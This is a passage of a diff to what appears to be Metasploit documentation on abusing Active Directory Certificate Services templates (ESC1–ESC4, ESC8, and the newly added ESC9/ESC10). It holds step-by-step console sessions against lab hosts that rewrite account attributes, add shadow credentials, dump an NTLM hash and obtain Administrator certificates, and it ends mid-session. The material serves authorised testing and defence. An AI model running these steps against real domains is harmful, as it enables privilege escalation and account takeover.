 [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500
 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216155701_default_unknown_windows.ad.cs_756798.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) > loot
+msf auxiliary(admin/dcerpc/icpr_cert) > loot

 Loot
 ====
@@ -556,7 +566,7 @@ host  service  type           name             content               info
               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx
               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216155701_default_unknown_windows.ad.cs_756798.pfx

-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
@@ -592,8 +602,8 @@ Narrowing this list down to those we can actually enroll in as users, this leave
 We'll first get the cert using `ipcr_cert` with the `ESC3-Template1` certificate.

 ```msf
-msf6 > use auxiliary/admin/dcerpc/icpr_cert
-msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+msf > use auxiliary/admin/dcerpc/icpr_cert
+msf auxiliary(admin/dcerpc/icpr_cert) > show options

 Module options (auxiliary/admin/dcerpc/icpr_cert):

@@ -623,19 +633,19 @@ Auxiliary action:

 View the full module info with the info, or info -d command.

-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
 SMBUser => normaluser
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
 SMBPass => normalpass
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
 SMBDomain => DAFOREST
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+msf auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
+msf auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
 CA => daforest-WIN-BR0CCBA815B-CA
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Template1
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Template1
 CERT_TEMPLATE => ESC3-Template1
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 172.30.239.85

 [*] 172.30.239.85:445 - Requesting a certificate...
@@ -644,7 +654,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-1611
 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) > loot
+msf auxiliary(admin/dcerpc/icpr_cert) > loot

 Loot
 ====
@@ -654,17 +664,17 @@ host  service  type           name             content               info
               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216173718_default_unknown_windows.ad.cs_580032.pfx
               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx

-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 Next, we'll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the `User` template for this:

 ```msf
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
+msf auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
 PFX => /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF DAFOREST\\Administrator
+msf auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF DAFOREST\\Administrator
 ON_BEHALF_OF => DAFOREST\Administrator
-msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+msf auxiliary(admin/dcerpc/icpr_cert) > show options

 Module options (auxiliary/admin/dcerpc/icpr_cert):

@@ -697,9 +707,9 @@ Auxiliary action:

 View the full module info with the info, or info -d command.

-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
 CERT_TEMPLATE => User
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 172.30.239.85

 [*] 172.30.239.85:445 - Requesting a certificate...
@@ -708,15 +718,15 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500
 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216174559_default_unknown_windows.ad.cs_570105.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 Just to show this is also possible with `ESC3-Template2` here is a snippet showing that also works:

 ```msf
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Template2
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Template2
 CERT_TEMPLATE => ESC3-Template2
-msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+msf auxiliary(admin/dcerpc/icpr_cert) > show options

 Module options (auxiliary/admin/dcerpc/icpr_cert):

@@ -749,7 +759,7 @@ Auxiliary action:

 View the full module info with the info, or info -d command.

-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 172.30.239.85

 [*] 172.30.239.85:445 - Requesting a certificate...
@@ -758,7 +768,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500
 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216180342_default_unknown_windows.ad.cs_390825.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
@@ -774,20 +784,20 @@ the `ESC4-Test` certificate template does not allow the certificate's subject na
 `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag is not set in the `msPKI-Certificate-Name-Flag` field).

 ```msf
-msf6 > use auxiliary/admin/dcerpc/icpr_cert 
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+msf > use auxiliary/admin/dcerpc/icpr_cert 
+msf auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
 SMBUser => normaluser
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
 SMBPass => normalpass
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
+msf auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
 CA => daforest-WIN-BR0CCBA815B-CA
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC4-Test
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC4-Test
 CERT_TEMPLATE => ESC4-Test
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
+msf auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
 ALT_UPN => Administrator@daforest.com
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run 
+msf auxiliary(admin/dcerpc/icpr_cert) > run 
 [*] Running module against 172.30.239.85

 [-] 172.30.239.85:445 - There was an error while requesting the certificate.
@@ -796,7 +806,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [-] 172.30.239.85:445 -   Source:  (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
 [-] 172.30.239.85:445 -   HRESULT: (0x80094812) CERTSRV_E_SUBJECT_EMAIL_REQUIRED: The email name is unavailable and cannot be added to the Subject or Subject Alternate name.
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) > 
+msf auxiliary(admin/dcerpc/icpr_cert) > 
 ```

 Next, we use the `ad_cs_cert_template` module to update the `ESC4-Test` certificate template. This process first makes a
@@ -805,20 +815,20 @@ update the object in Active Directory. The local certificate template data can b
 descriptor.

 ```msf
-msf6 auxiliary(admin/dcerpc/icpr_cert) > use auxiliary/admin/ldap/ad_cs_cert_template 
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set RHOSTS 172.30.239.85
+msf auxiliary(admin/dcerpc/icpr_cert) > use auxiliary/admin/ldap/ad_cs_cert_template 
+msf auxiliary(admin/ldap/ad_cs_cert_template) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set USERNAME normaluser
+msf auxiliary(admin/ldap/ad_cs_cert_template) > set USERNAME normaluser
 USERNAME => normaluser
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set PASSWORD normalpass
+msf auxiliary(admin/ldap/ad_cs_cert_template) > set PASSWORD normalpass
 PASSWORD => normalpass
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set CERT_TEMPLATE ESC4-Test
+msf auxiliary(admin/ldap/ad_cs_cert_template) > set CERT_TEMPLATE ESC4-Test
 CERT_TEMPLATE => ESC4-Test
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION UPDATE 
+msf auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION UPDATE 
 ACTION => UPDATE
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set VERBOSE true 
+msf auxiliary(admin/ldap/ad_cs_cert_template) > set VERBOSE true 
 VERBOSE => true
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
+msf auxiliary(admin/ldap/ad_cs_cert_template) > run
 [*] Running module against 172.30.239.85

 [+] Successfully bound to the LDAP server!
@@ -830,32 +840,32 @@ msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
 [*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
 [+] The operation completed successfully!
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) > 
+msf auxiliary(admin/ldap/ad_cs_cert_template) > 
 ```

 Now that the certificate template has been updated to be vulnerable to ESC1, then we can use the `previous` shortcut
 to switch back to the last module and reattempt to issue the certificate. This time, the operation succeeds.

 ```msf
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) > previous 
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/ldap/ad_cs_cert_template) > previous 
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 172.30.239.85

 [+] 172.30.239.85:445 - The requested certificate was issued.
 [*] 172.30.239.85:445 - Certificate UPN: Administrator@daforest.com
 [*] 172.30.239.85:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) > 
+msf auxiliary(admin/dcerpc/icpr_cert) > 
 ```

 Finally, we switch back to the `ad_cs_cert_template` module to restore the original configuration. We do this by
 setting the local template data option `TEMPLATE_FILE` to the JSON file that was created by the previous run.

 ```msf
-msf6 auxiliary(admin/dcerpc/icpr_cert) > previous 
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set TEMPLATE_FILE /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json
+msf auxiliary(admin/dcerpc/icpr_cert) > previous 
+msf auxiliary(admin/ldap/ad_cs_cert_template) > set TEMPLATE_FILE /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json
 TEMPLATE_FILE => /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
+msf auxiliary(admin/ldap/ad_cs_cert_template) > run
 [*] Running module against 172.30.239.85

 [+] Successfully bound to the LDAP server!
@@ -866,7 +876,7 @@ msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
 [*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083942_default_172.30.239.85_windows.ad.cs.te_000095.json
 [+] The operation completed successfully!
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/ldap/ad_cs_cert_template) >
+msf auxiliary(admin/ldap/ad_cs_cert_template) >
 ```

 At this point the certificate template's configuration has been restored and the operator has a certificate that can be
@@ -892,10 +902,10 @@ In the following example the AUTO mode is used to issue a certificate for the MS
 authenticated.

 ```msf
-msf6 auxiliary(server/relay/esc8) > set RHOSTS 172.30.239.85
-msf6 auxiliary(server/relay/esc8) > run
+msf auxiliary(server/relay/esc8) > set RHOSTS 172.30.239.85
+msf auxiliary(server/relay/esc8) > run
 [*] Auxiliary module running as background job 1.
-msf6 auxiliary(server/relay/esc8) > 
+msf auxiliary(server/relay/esc8) > 
 [*] SMB Server is running. Listening on 0.0.0.0:445
 [*] Server started.
 [*] New request from 192.168.159.129
@@ -921,6 +931,392 @@ msf6 auxiliary(server/relay/esc8) >
 [*] Identity: MSFLAB\smcintyre - All targets relayed to
 ```

+# Overview of exploiting ESC9 and ESC10 with Metasploit
+
+ESC9 and ESC10 are similar certificate misconfiguration abuse techniques. They both involve having credentials of a
+user, say "user1", who has GenericWrite privileges over "user2". This allows an attacker as "user1" to update either the
+`userPrincipalName` or `dNSHostName` attribute of "user2". In order to update the attribute, we need to authenticate 
+via LDAP - which is a unique requirement compared to the  other ESC techniques and is why there is a separated
+module called `esc_update_ldap_object` which combines the attribute update via LDAP and certificate issuance process.
+
+If the AD CS server is configured to allow "weak certificate mappings" when a user is requesting a certificate, the
+server will check the `userPrincipalName` or the `dNSHostName` of the requesting identity and then issue a certificate
+based on that value.  Therefore if we can update "user2"'s UPN to "Administrator" and then request a certificate on
+behalf of "user2" we can get an Administrator certificate (easy priv esc horay). That is the essence of both ESC9 and
+ESC10 minus a number of details we'll get into.
+
+It's also worth noting that the following registry keys and preventative measure and exploit techniques (ESC9 and 10) all stem from
+Microsoft attempts to patch CVE-2022–26923 (aka Certifried). During this effort they implemented the new
+`szOID_NTDS_CA_SECURITY_EXT` security extension for issued certificates, which will embed the `objectSid`
+property of the requester, to help facilitate "strong certificate mappings", along with the following registry keys
+and certificate template flags.
+
+## StrongCertificateBindingEnforcement
+Located in: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc`
+
+This registry key defines what is considered weak and strong certificate mappings for **Kerberos authentication**. Possible values:
+
+| Setting | Method                                                                                           | Strength assessment |
+| ------- |--------------------------------------------------------------------------------------------------|---------------------|
+| 0       | No strong certificate mapping checks are done                                                    | weak                |
+| 1       | Will use strong mapping if present though can be ignored if CT_FLAG_NO_SECURITY_EXTENSION is set | weak                |
+| 2       | Full Enforcement Mode (No weak mappings allowed)                                                 | strong              |
+
+In order to exploit these certificate misconfiguration we will need the value of  `StrongCertificateBindingEnforcement` to be either `0` or `1`.
+If the value is set to `2` we cannot exploit the misconfiguration using Kerberos authentication.
+
+## CertificateMappingMethods
+Located in: `HKLM\System\CurrentControlSet\Control\SecurityProviders\Schannel`
+
+This registry key defines what is considered weak and strong certificate mappings for **Schannel authentication**. Possible values:
+
+| Bit | Setting | Method                                | Strength assessment |
+| --- | ------- | ------------------------------------- | ------------------- |
+| 1   | 0x0001  | Subject/Issuer certificate mapping    | weak                |
+| 2   | 0x0002  | Issuer certificate mapping            | weak                |
+| 3   | 0x0004  | UPN certificate mapping               | weak                |
+| 4   | 0x0008  | S4U2Self certificate mapping          | strong              |
+| 5   | 0x0010  | S4U2Self explicit certificate mapping | strong              |
+| 1-5 | 0x001F  | All of the above values               | weak                |
+
+In order to exploit these certificate misconfiguration using Schannel authentication we will need the value of
+`CertificateMappingMethods` to be `UPN certificate mapping` (or `All the above values`)
+
+
+## CT_FLAG_NO_SECURITY_EXTENSION
+Certificate templates now include an attribute called `msPKI-Enrollment-Flag`. The `msPKI-Enrollment-Flag` attribute
+defines how certificate enrollment behaves by enabling or disabling specific behaviors via a bitmask of flags. If the
+attribute contains the value:`0x00080000` (aka `CT_FLAG_NO_SECURITY_EXTENSION`) then the `szOID_NTDS_CA_SECURITY_EXT`
+is not included and we can exploit weak certificate mappings even if `StrongCertificateBindingEnforcement` is set to 1.
+
+
+## Changing userPrincipalName vs dNSHostName
+Both can be used to exploit the certificate misconfiguration. It should be noted that normal users don't have a `dNSHostName`
+attribute, only machine accounts do.
+
+# Exploiting ESC9
+## ESC9 Scenario 1
+Pre-requisites:
+- `StrongCertificateBindingEnforcement` is set to `1` (if it's set to `0` exploitation will still work but technically you're exploiting ESC10 in that case)
+- A vulnerable certificate template has the `CT_FLAG_NO_SECURITY_EXTENSION` flag set. 
+- The same vulnerable template has the `SubjectAltRequireUPN` flag set.
+- The same vulnerable template has a client authentication EKU
+- We have credentials of a user who has `GenericWrite` privileges over another user that can enroll in the vulnerable template
+
+```
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+...
+[+] Template: ESC9-Template
+[*]   Distinguished Name: CN=ESC9-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=kerberos,DC=issue
+[*]   Manager Approval: Disabled
+[*]   Required Signatures: 0
+[!]   Potentially vulnerable to: ESC9 (the template is in a vulnerable configuration but in order to exploit registry key StrongCertificateBindingEnforcement must not be set to 2)
+[*]   Notes:
+[*]     * ESC9: Template has msPKI-Enrollment-Flag set to 0x80000 (CT_FLAG_NO_SECURITY_EXTENSION) and specifies a client authentication EKU and user1 has write privileges over user2 and the template has a subjectAltName (UPN or DNS) requirement
+[*]  Certificate Template Write-Enabled SIDs:
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1602 (user1)
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1603 (user2)
+[*]     * S-1-5-11 (Authenticated Users)
+[*]   Certificate Template Enrollment SIDs:
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1602 (user1)
+[*]     * S-1-5-21-2324486357-3075865580-3606784161-1603 (user2)
+[*]     * S-1-5-11 (Authenticated Users)
+...
+```
+Now we can see the above template is possibly exploitable if the `StrongCertificateBindingEnforcement` is set to `1`. In 
+our case it is so we can proceed with exploitation. 
+
+We will set a number of datastore options in order to exploit ESC9 in this scenario.
+We will set `RHOSTS`, `CERT_TEMPLATE`, and `CA` as we normally would. In order to update the UPN of the
+target user we must connect to LDAP and so the datastore options `LDAPUsername`, `LDAPPassword`, and `LDAPDomain`
+are the credentials of the user who has `GenericWrite` privileges over the `TARGET_USERNAME`. Note `LDAPRport` must be
+set in order to connect however it defaults to 389.
+
+The option `UPDATE_LDAP_OBJECT` is an enum that can be set to either `userPrincipalName`  or `dNSHostName` and must be
+set in order to instruct the module to attempt to exploit ESC9 or ESC10. We will set `UPDATE_LDAP_OBJECT` to
+`userPrincipalName` in this case and so we then must set `UPDATE_LDAP_OBJECT_VALUE` to `Administrator`.
+
+It's important for this scenario, when updating the UPN to omit the domain suffix from the UPN to avoid conflicts with
+other UPNs in the domain, which by default all contain the suffix. The UPN processing order will still allow the DC to
+map the UPN Administrator in our writable account to the actual administrator, making its impersonation possible.
+
+It's also important to note that after issuing the certificate we must revert the `userPrincipalName` of the
+`TARGET_USERNAME` back to the original value before attempting to use the certificate or the certificate will not work. 
+This is done automatically by the module. 
+
+In the following example, the ESC9-Template template is vulnerable to ESC9 and will yield a ticket for Administrator once complete. 
+
+```
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username user2
+target_username => user2
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername user1
+ldapusername => user1
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set cert_template ESC9-Template
+cert_template => SpencerTest
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ca kerberos-DC2-CA
+ca => kerberos-DC2-CA
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE Administrator
+UPDATE_LDAP_OBJECT_VALUE => Administrator
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: user2
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for user2
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_windows.ad.cs_563081.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 2ff08c15-0ab3-98ad-ee0b-3fd1fbcf3e9d
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for user2
+[!] Warning: Provided principal and realm (user2@kerberos.issue) do not match entries in certificate:
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_mit.kerberos.cca_263627.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for user2@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_mit.kerberos.cca_015140.bin
+[+] Found NTLM hash for user2: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250717140907_default_172.16.199.200_windows.ad.cs_548728.pfx
+[*] 172.16.199.200:445 - reverting ldap object
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] No matching entries found - check device ID
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: Administrator
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to user2...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user2
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
+domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.
+
+## ESC9 Scenario 2
+Pre-requisites:
+- `StrongCertificateBindingEnforcement` is set to `1` (if it's set to `0` exploitation will still work but technically you're exploiting ESC10 in that case)
+- A vulnerable certificate template has the `CT_FLAG_NO_SECURITY_EXTENSION` flag set.
+- The same vulnerable template has the `SubjectAltRequireDNS` flag set. <--- (Difference 1/2 between pre-requisites in scenario 1 and 2)
+- The same vulnerable template has a client authentication EKU
+- We have credentials of a machine account who has `GenericWrite` privileges over another **machine account** that can enroll in the vulnerable template <--- (Difference 2/2 between pre-requisites in scenario 1 and 2)
+  - Only machine accounts can have the `dNSHostName` attribute set, so our "target_user" needs to be machine account
+
+The option `UPDATE_LDAP_OBJECT` will now be set to `dNSHostName` and because only machine accounts have the `dNSHostName` attribute we will set our `TARGET_USER` to the machine account`Test2$`
+We will be changing the `dNSHostName` of the machine account `Test1$` to `DC2.kerberos.issue` (`DC2` is the hostname of the domain controller) in hopes to impersonate the Domain Controller machine account
+
+`CERT_TEMPLATE` will be set to `ESC9-Template-Dns` which is the same template as `ESC9-Template` but with the `SubjectAltRequireDNS` flag set instead of the `SubjectAltRequireUPN` flag.
+
+```
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username "Test2$"
+target_username => Test2$
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE dc2.kerberos.issue
+UPDATE_LDAP_OBJECT_VALUE => dc2.kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT dnsHostName
+UPDATE_LDAP_OBJECT => dNSHostName
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CA kerberos-DC2-CA
+CA => kerberos-DC2-CA
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CERT_TEMPLATE ESC9-Template-Dns
+CERT_TEMPLATE => ESC9-Template-Dns
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername Test1$
+ldapusername => Test1$
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Reloading module...
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of Test2$'s dNSHostName:
+[*] Attempting to update dNSHostName for CN=Test2,CN=Computers,DC=kerberos,DC=issue to dc2.kerberos.issue...
+[+] Successfully updated CN=Test2,CN=Computers,DC=kerberos,DC=issue's dNSHostName to dc2.kerberos.issue
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for Test2$
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250717141705_default_172.16.199.200_windows.ad.cs_907188.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 517757a2-5174-5c43-6005-102c4429ff05
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for user2
+[!] Warning: Provided principal and realm (Test2$@kerberos.issue) do not match entries in certificate:
